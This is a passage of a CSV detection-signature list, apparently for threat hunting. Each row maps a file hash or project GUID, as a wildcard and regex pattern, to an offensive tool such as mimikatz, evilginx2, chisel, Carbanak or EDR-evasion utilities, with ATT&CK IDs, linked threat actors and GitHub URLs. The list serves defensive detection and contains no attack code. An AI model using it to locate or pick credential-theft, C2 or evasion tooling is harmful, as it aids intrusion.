Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","29990" "*81a130c4d44dacad8a175fef8eeecd9561e938f8cb5de366795a9213b76fe1c7*",".{0,1000}81a130c4d44dacad8a175fef8eeecd9561e938f8cb5de366795a9213b76fe1c7.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","29993" 
"*81a235c1c9cdb34c44f468239bd06a590a54cc4fcd624c676200097b45d55165*",".{0,1000}81a235c1c9cdb34c44f468239bd06a590a54cc4fcd624c676200097b45d55165.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29995" "*81a235c1c9cdb34c44f468239bd06a590a54cc4fcd624c676200097b45d55165*",".{0,1000}81a235c1c9cdb34c44f468239bd06a590a54cc4fcd624c676200097b45d55165.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - 
Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","29996" "*81a2d83a2d25f5ff053db7c730e776a0be57bc383cb3754f491a9101ec5888d2*",".{0,1000}81a2d83a2d25f5ff053db7c730e776a0be57bc383cb3754f491a9101ec5888d2.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","29997" "*81b03c89401930471bcb79a16998e446fa63b1412b2bd32cc25e175b0bbd7ee9*",".{0,1000}81b03c89401930471bcb79a16998e446fa63b1412b2bd32cc25e175b0bbd7ee9.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","29998" "*81b115a9e1d6c8333dbac2759eadbd56badd489ecc04eadff97217671d789776*",".{0,1000}81b115a9e1d6c8333dbac2759eadbd56badd489ecc04eadff97217671d789776.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","29999" "*81b24314538ad9dd740093c63a7925f039ccbdcac4e2944fd8cdf238f05ad8fc*",".{0,1000}81b24314538ad9dd740093c63a7925f039ccbdcac4e2944fd8cdf238f05ad8fc.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30000" "*81c02fac6308e64ef8eba1bf4088b04daf1d33ac295c9a376b31e616cd3d4cec*",".{0,1000}81c02fac6308e64ef8eba1bf4088b04daf1d33ac295c9a376b31e616cd3d4cec.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30001" "*81c3f4341d0cecc16beaae19c88e54dda2730a4eaf06cc0fea0119822d7482c3*",".{0,1000}81c3f4341d0cecc16beaae19c88e54dda2730a4eaf06cc0fea0119822d7482c3.{0,1000}","offensive_tool_keyword","Powerlurk","PowerLurk is a PowerShell toolset for building malicious WMI Event Subsriptions","T1084 - T1059.001 - T1546.003 - T1053.005","TA0003 - TA0005 - TA0002 - TA0006","N/A","N/A","Persistence","https://github.com/Sw4mpf0x/PowerLurk","1","0","#filehash","N/A","10","4","384","72","2016-07-25T22:19:22Z","2016-07-13T20:07:25Z","30002" 
"*81c6fe2b2271e9d8ee7921112070316d2855a2c73f5e78515f131ec6265316be*",".{0,1000}81c6fe2b2271e9d8ee7921112070316d2855a2c73f5e78515f131ec6265316be.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30003" "*81ccd233e6830ef2e6f9e2be11588fa65df5bde1fad76f46d161814f6f18f785*",".{0,1000}81ccd233e6830ef2e6f9e2be11588fa65df5bde1fad76f46d161814f6f18f785.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30005" "*81cd3e0dfad46b8baf1d60ca5487c459fd64fdfd31340964ad6b4627605ceb5d*",".{0,1000}81cd3e0dfad46b8baf1d60ca5487c459fd64fdfd31340964ad6b4627605ceb5d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30006" "*81d83bf089c11822c0215544c70718ef1577c0d6b27d6f93535ea0b3fdd07f57*",".{0,1000}81d83bf089c11822c0215544c70718ef1577c0d6b27d6f93535ea0b3fdd07f57.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30008" "*81da530e620cf0c86a3b6a99d562e7c175951d9417264be1dab397c4146814ab*",".{0,1000}81da530e620cf0c86a3b6a99d562e7c175951d9417264be1dab397c4146814ab.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30009" "*81e1e9186bb461b669b4bbd4dab4534c980e6d2bc27975e6ec7305bc935cf429*",".{0,1000}81e1e9186bb461b669b4bbd4dab4534c980e6d2bc27975e6ec7305bc935cf429.{0,1000}","offensive_tool_keyword","fakelogonscreen","Fake Windows logon screen to steal passwords","T1056.002 - T1078 - T1110 - T1555","TA0006 - TA0003 - TA0009","N/A","N/A","Credential 
Access","https://github.com/bitsadmin/fakelogonscreen","1","0","#filehash","N/A","10","10","1325","236","2020-02-03T23:28:01Z","2020-02-01T18:51:35Z","30011" "*81e2c46d9fa49c65a9ad0ab69dd121b110d63dd12242b12619b487532a6fb6ad*",".{0,1000}81e2c46d9fa49c65a9ad0ab69dd121b110d63dd12242b12619b487532a6fb6ad.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30012" "*81E60DC6-694E-4F51-88FA-6F481B9A4208*",".{0,1000}81E60DC6\-694E\-4F51\-88FA\-6F481B9A4208.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","#GUIDproject","N/A","8","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","30014" "*81E60DC6-694E-4F51-88FA-6F481B9A4208*",".{0,1000}81E60DC6\-694E\-4F51\-88FA\-6F481B9A4208.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1055.001 - T1070 - T1070.004 - T1211","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/UnhookingPatch","1","0","#GUIDproject","N/A","9","4","304","52","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z","30015" "*81f9ec1160d8019b6279927295f308a0697e132b3f09876e9d1e4b2e2192be55*",".{0,1000}81f9ec1160d8019b6279927295f308a0697e132b3f09876e9d1e4b2e2192be55.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & 
Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","30019" "*81fc4f198955aef68c590f3c04dc1fd4184a7e7b55648a67422a51f3dcf79382*",".{0,1000}81fc4f198955aef68c590f3c04dc1fd4184a7e7b55648a67422a51f3dcf79382.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","30020" "*82120dbb875df3481d154d0cc4d420c3835a57534f8ab2e9795f239b58d5987a*",".{0,1000}82120dbb875df3481d154d0cc4d420c3835a57534f8ab2e9795f239b58d5987a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30024" "*8213d434f255fbfba9d5432770a6b4ff85463271047384feba7176a301436634*",".{0,1000}8213d434f255fbfba9d5432770a6b4ff85463271047384feba7176a301436634.{0,1000}","offensive_tool_keyword","PySQLRecon","Offensive MSSQL toolkit written in Python, based off SQLRecon","T1040 - T1078 - T1072 - T1223 - T1059 - T1213","TA0001 - TA0002 - TA0007 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Tw1sm/PySQLRecon","1","0","#filehash","N/A","10","3","201","15","2025-01-12T02:14:59Z","2023-09-03T01:14:35Z","30025" "*8215225624132cd5a3c16699071178bea0fc91cd6195f67d1a5e8094142dcfe1*",".{0,1000}8215225624132cd5a3c16699071178bea0fc91cd6195f67d1a5e8094142dcfe1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux 
#windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30026" "*8219b80a1dc5a84380f9c5af9e7204e0e2029a173e8ddad57c32a722564832ce*",".{0,1000}8219b80a1dc5a84380f9c5af9e7204e0e2029a173e8ddad57c32a722564832ce.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP - C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","0","#filehash","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","30027" "*821a3a1dee846b299275f7cc29f51b3d20c651db082832b904ea15f8a73ad9bb*",".{0,1000}821a3a1dee846b299275f7cc29f51b3d20c651db082832b904ea15f8a73ad9bb.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","30028" "*8221def0e258e6b6b170cc5ea499e9744e527dda36524b06ff2bce9421a70f2e*",".{0,1000}8221def0e258e6b6b170cc5ea499e9744e527dda36524b06ff2bce9421a70f2e.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","30029" "*82277B35-D159-4B44-8D54-FB66EDD58D5C*",".{0,1000}82277B35\-D159\-4B44\-8D54\-FB66EDD58D5C.{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","#GUIDproject","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","30031" "*8227f4b2d421a5bfb565d45f8abccd5d0cbda6e2fe6a4caab5bb6078158245d2*",".{0,1000}8227f4b2d421a5bfb565d45f8abccd5d0cbda6e2fe6a4caab5bb6078158245d2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30032" "*82296b7a1d8b420d648c3ca0aa9f6560d11729d3fb97f534f03afd10a6d6460b*",".{0,1000}82296b7a1d8b420d648c3ca0aa9f6560d11729d3fb97f534f03afd10a6d6460b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","30034" "*822d1259e7b03a5113743e2840d3338236159670d94aaf41431b7d6391268300*",".{0,1000}822d1259e7b03a5113743e2840d3338236159670d94aaf41431b7d6391268300.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name 
(Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","30035" "*8231ce10a57076634d408749cd0a06eb178c2f0af84ea8d7284651bbd8320c39*",".{0,1000}8231ce10a57076634d408749cd0a06eb178c2f0af84ea8d7284651bbd8320c39.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30036" "*823c3d2bbca46e7aedadfef6893babcbf14b0182e598a9ba958b84892daaeeb1*",".{0,1000}823c3d2bbca46e7aedadfef6893babcbf14b0182e598a9ba958b84892daaeeb1.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30037" "*8245a0542c25505872414878bbb0bac624145b348d83e458a079732c9c457924*",".{0,1000}8245a0542c25505872414878bbb0bac624145b348d83e458a079732c9c457924.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 
- TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30038" "*824887ee1daa53cde973218847328c1e159926dba2fb50fa3d5dff2b9d7c40c4*",".{0,1000}824887ee1daa53cde973218847328c1e159926dba2fb50fa3d5dff2b9d7c40c4.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30039" "*8248D38639F4808913BB926B20C9AB1B31908BCE8C3A564FF496A8883DE01C97*",".{0,1000}8248D38639F4808913BB926B20C9AB1B31908BCE8C3A564FF496A8883DE01C97.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30040" "*825790dbcdf9b7a69b9a566f71bc167a0a8353e735390c5815b247ac58efa817*",".{0,1000}825790dbcdf9b7a69b9a566f71bc167a0a8353e735390c5815b247ac58efa817.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","30042" "*825b4d331afd5cd191607e13cf649bceb7aa5eaf90451538a8953b5052ca7502*",".{0,1000}825b4d331afd5cd191607e13cf649bceb7aa5eaf90451538a8953b5052ca7502.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30043" "*825E2088-EC7C-4AB0-852A-4F1FEF178E37*",".{0,1000}825E2088\-EC7C\-4AB0\-852A\-4F1FEF178E37.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft 
Graph API post-exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#GUIDproject","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","30044" "*82662ee50b98d617aa8f7859c65bb88030e6a68fe72cf4c7fef5fc94da350046*",".{0,1000}82662ee50b98d617aa8f7859c65bb88030e6a68fe72cf4c7fef5fc94da350046.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","30046" "*826b9353f66c3b17151b57e87e656314b6ec0397dcfb5cb2f61faa6cf92c7c91*",".{0,1000}826b9353f66c3b17151b57e87e656314b6ec0397dcfb5cb2f61faa6cf92c7c91.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30047" "*826c1daf512bcd2152b6328fc55b1ed403ed41fd1a6fc1afa6e35f34e4b9f8bc*",".{0,1000}826c1daf512bcd2152b6328fc55b1ed403ed41fd1a6fc1afa6e35f34e4b9f8bc.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","#filehash","N/A","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","30048" "*826edaeac303c78994a597c1e2ea0ce81c4ab628138b78677517661c32653523*",".{0,1000}826edaeac303c78994a597c1e2ea0ce81c4ab628138b78677517661c32653523.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of 
common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30049" "*827310760fa3d7371a22ff5f06e406f3e0a6cbe1c7e7f38244e0334a2d5eca7d*",".{0,1000}827310760fa3d7371a22ff5f06e406f3e0a6cbe1c7e7f38244e0334a2d5eca7d.{0,1000}","offensive_tool_keyword","DirtyCLR","An App Domain Manager Injection DLL PoC","T1055.001 - T1546.016 - T1055.013","TA0005 - TA0004","N/A","Black Basta","Privilege Escalation","https://github.com/ipSlav/DirtyCLR","1","0","#filehash","N/A","7","2","170","19","2023-12-14T21:22:12Z","2023-12-11T11:29:36Z","30050" "*827D241C-6A9B-48B0-BA8C-F21EF2849405*",".{0,1000}827D241C\-6A9B\-48B0\-BA8C\-F21EF2849405.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). 
It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#GUIDproject","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","30051" "*828411d980e653c3fa63dd031839e52ae1800b4f29f3b03f7acad492811dce2b*",".{0,1000}828411d980e653c3fa63dd031839e52ae1800b4f29f3b03f7acad492811dce2b.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","#filehash","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","30052" "*82855507e35b8f9645bd13b04b74a9cbb02afe3815d37ee7f4837aa7e97eeb10*",".{0,1000}82855507e35b8f9645bd13b04b74a9cbb02afe3815d37ee7f4837aa7e97eeb10.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","30054" 